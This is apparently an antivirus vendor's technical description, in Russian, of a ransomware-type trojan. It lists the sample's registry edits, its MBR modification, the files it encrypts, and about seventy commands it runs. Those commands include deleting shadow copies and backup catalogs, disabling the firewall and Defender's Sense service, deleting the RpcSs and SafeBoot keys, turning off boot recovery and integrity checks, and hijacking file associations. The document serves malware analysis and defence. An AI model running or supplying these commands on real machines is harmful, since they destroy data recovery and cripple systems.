Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKLM>\Software\Classes\.com] '' = 'txtfile'
- [<HKLM>\Software\Classes\.bat] '' = 'txtfile'
- [<HKLM>\Software\Classes\.cmd] '' = 'txtfile'
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
Модифицирует главную загрузочную запись (MBR).
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Редактора реестра (RegEdit)
блокирует:
- Компонент восстановления системы (SR)
удаляет теневые копии разделов.
Запускает на исполнение
- '<SYSTEM32>\netsh.exe' firewall set opmode mode = disable
Внедряет код в
следующие системные процессы:
- <SYSTEM32>\vds.exe
Без разрешения пользователя устанавливает новую стартовую страницу для Windows Internet Explorer.
Изменения в файловой системе
Присваивает атрибут 'скрытый' для следующих файлов
- <Полный путь к файлу>
Изменяет следующие файлы
- D:\install.log
- C:\far2\addons\shell\farhere.inf
- C:\far2\addons\shell\descript.ion
- C:\far2\addons\setup\descript.ion
- C:\far2\addons\readme.txt
- C:\far2\addons\macros\descript.ion
- C:\far2\addons\descript.ion
- C:\far2\addons\colors\import_colors.bat
- C:\far2\addons\colors\export_colors.bat
- C:\far2\addons\colors\descript.ion
- C:\far2\addons\colors\default_highlighting\import_colors.bat
- <Имя диска съемного носителя>:\stoc13_ml_quoc_le.pptx
- <Имя диска съемного носителя>:\hypothyroidism_slides.pptx
- C:\far2\addons\colors\default_highlighting\descript.ion
- %HOMEPATH%\desktop\total commander 64 bit.lnk
- %HOMEPATH%\desktop\telegram.lnk
- C:\far2\addons\colors\custom_highlighting\import_colors.bat
- %HOMEPATH%\desktop\qip 2012.lnk
- %HOMEPATH%\desktop\mail.ru agent.lnk
- C:\far2\addons\colors\custom_highlighting\descript.ion
- %HOMEPATH%\desktop\icq.lnk
- %HOMEPATH%\desktop\desktop.ini
- <Имя диска съемного носителя>:\split.avi
- %HOMEPATH%\desktop\adadsi.html
- %HOMEPATH%\desktop\about.htm
- %HOMEPATH%\desktop\64bit_notes.htm
- %HOMEPATH%\desktop\168.jpeg
- <Имя диска съемного носителя>:\delete.avi
- C:\far2\addons\xlat\descript.ion
- C:\far2\addons\xlat\russian\descript.ion
Изменяет множество файлов.
Изменяет множество файлов пользовательских данных (Trojan.Encoder).
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c SC Delete DcomLaunch
- '<SYSTEM32>\cmd.exe' /c netsh advfirewall set currentprofile state off
- '<SYSTEM32>\cmd.exe' /c assoc .inf=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .bin=txtfile
- '<SYSTEM32>\vds.exe'
- '<SYSTEM32>\cmd.exe' /c assoc .efi=txtfile
- '<SYSTEM32>\wbengine.exe'
- '<SYSTEM32>\cmd.exe' /c assoc .gho=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .bat=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .reg=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .com=txtfile
- '<SYSTEM32>\cmd.exe' /c wbadmin delete catalog -quiet
- '<SYSTEM32>\reg.exe' Delete HKEY_CLASSES_ROOTDriveshell /f
- '<SYSTEM32>\cmd.exe' /c assoc .html=exefile
- '<SYSTEM32>\cmd.exe' /c reg Delete HKEY_CLASSES_ROOTDriveshell /f
- '<SYSTEM32>\wbadmin.exe' delete catalog -quiet
- '<SYSTEM32>\netsh.exe' advfirewall set currentprofile state off
- '<SYSTEM32>\cmd.exe' /c assoc .rar=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .zip=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .jpe=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .jpeg=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .png=txtfile
- '<SYSTEM32>\cmd.exe' /c vssadmin.exedelete shadows /all /quiet
- '<SYSTEM32>\cmd.exe' /c assoc .ico=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .gif=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .bmp=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .cmd=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .ppt=txtfile
- '<SYSTEM32>\bcdedit.exe' / set nointegritychecks on
- '<SYSTEM32>\cmd.exe' /c assoc .doc=exefile
- '<SYSTEM32>\cmd.exe' /c bcdedit.exe / set nointegritychecks on
- '<SYSTEM32>\cmd.exe' /c assoc .jpg=txtfile
- '<SYSTEM32>\cmd.exe' /c assoc .chm=txtfile
- '<SYSTEM32>\cmd.exe' /c netsh firewall set opmode mode = disable
- '<SYSTEM32>\cmd.exe' /c assoc .htm=exefile
- '<SYSTEM32>\cmd.exe' /c assoc .jfif=txtfile
- '<SYSTEM32>\reg.exe' add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' Delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f
- '<SYSTEM32>\cmd.exe' /c SC Delete SystemEventsBroker
- '<SYSTEM32>\reg.exe' add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' Delete Sense
- '<SYSTEM32>\cmd.exe' /c reg Delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f
- '<SYSTEM32>\cmd.exe' /c reg Delete HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon /f
- '<SYSTEM32>\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c SC Delete Sense
- '<SYSTEM32>\sc.exe' Delete DcomLaunch
- '<SYSTEM32>\cmd.exe' /c bcdedit / set{current} recoveryenabled No
- '<SYSTEM32>\bcdedit.exe' / set{default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\cmd.exe' /c bcdedit / set{default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\cmd.exe' /c reg delete HKEY_CURRENT_USER/Software/Microsoft/Internet/Explorer/MenuExt
- '<SYSTEM32>\reg.exe' delete HKEY_CURRENT_USER/Software/Microsoft/Internet/Explorer/MenuExt
- '<SYSTEM32>\sc.exe' Delete SystemEventsBroker
- '<SYSTEM32>\cmd.exe' /c SC Delete RpcSs
- '<SYSTEM32>\reg.exe' add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c wmic shadowcopy delete
- '<SYSTEM32>\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 01000000 /f
- '<SYSTEM32>\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 01000000 /f
- '<SYSTEM32>\reg.exe' Delete HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeMicrosoftWindows NTCurrentVersionWinlogon /f
- '<SYSTEM32>\reg.exe' add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c vssadmin delete shadows /all /quiet
- '<SYSTEM32>\sc.exe' Delete RpcSs
- '<SYSTEM32>\cmd.exe' /c reg Delete HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeMicrosoftWindows NTCurrentVersionWinlogon /f
- '<SYSTEM32>\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' Delete HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon /f
- '<SYSTEM32>\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c assoc .fla=txtfile
